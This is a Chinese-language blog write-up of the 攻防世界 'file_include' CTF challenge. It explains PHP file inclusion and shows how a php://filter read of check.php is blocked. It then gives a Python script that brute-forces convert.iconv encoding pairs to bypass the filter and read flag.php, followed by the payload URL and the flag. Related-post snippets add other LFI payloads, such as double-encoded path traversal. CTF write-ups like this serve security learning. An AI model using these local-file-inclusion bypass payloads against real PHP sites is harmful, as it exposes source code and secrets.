攻防世界-web-file_include

于 2024-05-12 17:07:52 发布
阅读量449 收藏 5
点赞数 3
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MateSnake/article/details/138732319
版权

题目

image.png
image.png

解题

通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题

文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。
require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。
include(),找不到被包含的文件时只会产生警告,脚本将继续运行。
include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。
require_once()与require()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。

读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload

?filename=php://filter/read=convert.base64-encode/resource=check.php

请求发现行不通,肯定是被过滤了
image.png

百度filter绕过过滤的时候发现了一种:

转换过滤器
如同 string.* 过滤器,convert.* 过滤器的作用就和其名字一样。
转换过滤器是 PHP 5.0.0 添加的。对于指定过滤器的更多信息,请参考该函数的手册页。
https://www.php.net/manual/zh/filters.convert.php
在激活 iconv 的前提下可以使用 convert.iconv.* 压缩过滤器, 
等同于用 iconv() 处理所有的流数据。 该过滤器不支持参数,
但可使用输入/输出的编码名称,组成过滤器名称,
比如 convert.iconv.<input-encoding>.<output-encoding> 
或 convert.iconv.<input-encoding>/<output-encoding> 
(两种写法的语义都相同)。

支持的字符编码

当前 mbstring 模块支持以下的字符编码。这些字符编码中的任意一个都能指定到 mbstring 函数中的 encoding 参数。

该 PHP 扩展支持的字符编码有以下几种:

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
ISO-2022-JP
ISO-2022-JP-MS
CP932
CP51932
SJIS-mac(别名:MacJapanese)
SJIS-Mobile#DOCOMO(别名:SJIS-DOCOMO)
SJIS-Mobile#KDDI(别名:SJIS-KDDI)
SJIS-Mobile#SOFTBANK(别名:SJIS-SOFTBANK)
UTF-8-Mobile#DOCOMO(别名:UTF-8-DOCOMO)
UTF-8-Mobile#KDDI-A
UTF-8-Mobile#KDDI-B(别名:UTF-8-KDDI)
UTF-8-Mobile#SOFTBANK(别名:UTF-8-SOFTBANK)
ISO-2022-JP-MOBILE#KDDI(别名:ISO-2022-JP-KDDI)
JIS
JIS-ms
CP50220
CP50220raw
CP50221
CP50222
ISO-8859-1*
ISO-8859-2*
ISO-8859-3*
ISO-8859-4*
ISO-8859-5*
ISO-8859-6*
ISO-8859-7*
ISO-8859-8*
ISO-8859-9*
ISO-8859-10*
ISO-8859-13*
ISO-8859-14*
ISO-8859-15*
ISO-8859-16*
byte2be
byte2le
byte4be
byte4le
BASE64
HTML-ENTITIES(别名:HTML)
7bit
8bit
EUC-CN*
CP936
GB18030
HZ
EUC-TW*
CP950
BIG-5*
EUC-KR*
UHC(别名:CP949)
ISO-2022-KR
Windows-1251(别名:CP1251)
Windows-1252(别名:CP1252)
CP866(别名:IBM866)
KOI8-R*
KOI8-U*
ArmSCII-8(别名:ArmSCII8)

因为上面的组合有81x81=6561种可能,于是我写了一个脚本
思路是:
1、通过脚本遍历跑6561种的搭配组合 来访问网站
2、获取返回的状态码和字符数 筛选出可疑的url并写入file_include_1.txt中
(我这里的筛选是:状态码为200,并且字符数大于1120就选为可疑url)

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
ISO-2022-JP
ISO-2022-JP-MS
CP932
CP51932
SJIS-mac
SJIS-Mobile#DOCOMO
SJIS-Mobile#KDDI
SJIS-Mobile#SOFTBANK
UTF-8-Mobile#DOCOMO
UTF-8-Mobile#KDDI-A
UTF-8-Mobile#KDDI-B
UTF-8-Mobile#SOFTBANK
ISO-2022-JP-MOBILE#KDDI
JIS
JIS-ms
CP50220
CP50220raw
CP50221
CP50222
ISO-8859-1*
ISO-8859-2*
ISO-8859-3*
ISO-8859-4*
ISO-8859-5*
ISO-8859-6*
ISO-8859-7*
ISO-8859-8*
ISO-8859-9*
ISO-8859-10*
ISO-8859-13*
ISO-8859-14*
ISO-8859-15*
ISO-8859-16*
byte2be
byte2le
byte4be
byte4le
BASE64
HTML-ENTITIES
7bit
8bit
EUC-CN*
CP936
GB18030
HZ
EUC-TW*
CP950
BIG-5*
EUC-KR*
UHC
ISO-2022-KR
Windows-1251
Windows-1252
CP866
KOI8-R*
KOI8-U*
ArmSCII-8

import requests


def saomiao():
    with open('./TXT/file_include.txt','r') as f:
        r_list = f.readlines()

    for i in r_list:
        front = i.replace('\n', '')
        for e in r_list:
            queen = e.replace('\n', '')
            url = 'http://61.147.171.105:54085/?filename=php://filter/convert.iconv.{}.{}/resource=check.php'.format(front,queen)
            response = requests.get(url=url)
            result = "{}   {}   {}".format(response.status_code, len(response.text), url)
            if((response.status_code == 200) and (len(response.text)>1120)):
                with open("./result/file_include_1.txt", "a" , encoding="utf-8") as f:
                    f.write("{}\n".format(result))

saomiao()

其实跑了很久,可疑的url也还是很多,但我找了一个记录里面字符数最长的访问了一下,发现新东西
image.png
image.png
看着应该是check.php 文件的源代码,然后我想修改url的check.php为flag.php看下有没有flag结果

http://61.147.171.105:54085/?filename=php://filter/convert.iconv.ASCII*.UTF-32*/resource=flag.php

image.png
结果还真有flag值

cyberpeace{07faad0fa636892b1d4e0b9bbdec03b4}

最后提交flag验证正确
image.png

拓展

除了写py脚本,也可以用burp 抓包然后跑,然后看返回的状态码和字符数

Manba_77
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界(CTF)~web-fileinclude
m0_75030189的博客
04-21 503
本题主要涉及到php伪协议和代码审计,如果文章有错误希望及时和小白我联系进行更改! 加油,又是刷题的一天!
攻防世界-file_include
m0_49025459的博客
12-18 6872
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
攻防世界file_include
m0_74979597的博客
09-13 1556
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
【愚公系列】2023年05月 攻防世界-Webfile_include
时光隧道
05-25 8915
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序漏洞,攻击者可以通过Web应用程序的漏洞,以某种形式包含恶意文件,或者包含在Web服务器上的其他敏感文件,从而实现权限提升、信息泄露、远程代码执行等攻击。具体案例介绍包括://定义一个变量$file并将其传递给include函数中执行 $file = $_GET [ 'file' ];攻击者通过修改传递的$file变量,替换为恶意代码文件,最终实现远程代码执行攻击。
攻防世界fileclude
qq_73861475的博客
05-20 2059
首先打开环境进入环境代码分析我们可以看出我们所找的flag就在flag.php这一个文件夹中,然后我们可以看出有两个变量$_GETfilel1和$GET_filel2,我们要获取到;两个变量的get数据给到filel1和filel2。构造payload,这里文件包含file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入注入 “?得到接着将得到的编码进行base64解码,得到flag为是php。
file_include(攻防世界)
m0_56107268的博客
11-14 7059
php转化器的学习
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
最新发布
06-01
【网络攻防课程seed-labs实验-Web_XSS_Elgg.zip】是一个针对网络安全学习的实验,主要关注Web应用程序中的跨站脚本(XSS)攻击。XSS是一种常见的网络攻击方式,攻击者通过在网页中注入恶意脚本,使用户在不知情的...
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
06-01
《网络攻防课程:深入解析Web SQL注入》 在网络安全领域,Web应用安全是一个至关重要的环节,其中SQL注入(SQL Injection)是常见的攻击手段之一。本实验“网络攻防课程seed-labs实验-Web_SQL_Injection.zip”旨在...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
网络攻防课程seed-labs实验-Crypto_MD5_Collision.zip
06-01
《网络攻防课程中的Crypto_MD5_Collision:深入理解MD5碰撞》 在网络安全领域,了解和掌握密码学基础知识是至关重要的。本实验——“Crypto_MD5_Collision”源自网络攻防课程,旨在让学生深入理解MD5哈希函数的碰撞...
网络攻防课程seed-labs实验-Environment_Variable_and_SetUID.zip
06-01
《网络攻防课程:环境变量与SetUID权限深入探索》 在网络安全领域,理解系统的工作原理至关重要,尤其是在涉及网络攻防的时候。本实验——“Environment_Variable_and_SetUID”旨在帮助学生深入理解两个关键概念:...
攻防世界file_include
小缪的博客
06-10 2823
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
网络安全 | CTF】攻防世界 file_include 解题详析(php伪协议+convert转换过滤器)
等风来
07-31 4731
也就是说我们修改POC之后得到的check.php中的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入中包含了。故猜想flag在flag.php中,修改POC即可得到flag。该题涉及到 convert转换过滤器。中的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?题目描述:怎么读取文件呢?对于本题,将初始POC。
攻防世界-file_include-详解
chinese_cabbage0的博客
02-04 1505
主要是这个题目的解题过程和原理,可以帮助大家学习文件包含漏洞
攻防世界-fileinclude
qq_70851535的博客
05-21 123
第二:构造过滤payload:php://fil1ter/=con1vert.ba1se64-e1ncode/re1source=check.php。过滤提示没了,证明绕过成功。发现是对convert.base64-encode进行过滤。发现被过滤了,黑名单过滤。第三:burpsuite抓包。
攻防世界-fileclude
m0_49025459的博客
12-28 1171
访问题目场景阅读php代码构造payload,这里文件包含file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入。
攻防世界17.fileinclude
weixin_49765221的博客
04-19 765
php的伪协议需要多理解呀
攻防世界--fileclude && fileinclude && inget && easytornado
08-25 2209
file2中包含数据file_get_contents。直接访问flag.php只显示WRONG WAY!说明flag应该在flag.php的注释里。file2使用php伪协议传数据。两个参数file1和file2。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值